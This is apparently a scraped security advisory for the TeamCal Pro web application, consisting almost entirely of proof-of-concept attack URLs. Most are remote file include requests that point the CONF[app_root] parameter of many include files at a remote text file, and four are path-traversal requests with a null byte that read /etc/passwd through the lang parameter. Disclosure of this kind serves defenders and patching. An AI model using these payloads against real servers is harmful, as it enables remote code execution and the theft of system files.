|
TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
Attackers may exploit these issues through a browser. The following proof-of-concept URIs are available: http://www.example.com/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/other.inc.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://www.example.com/020.txt? http://www.example.com/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00 http://www.example.com/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00 http://www.example.com/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00 http://www.example.com/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00 |
|
|
Privacy Statement |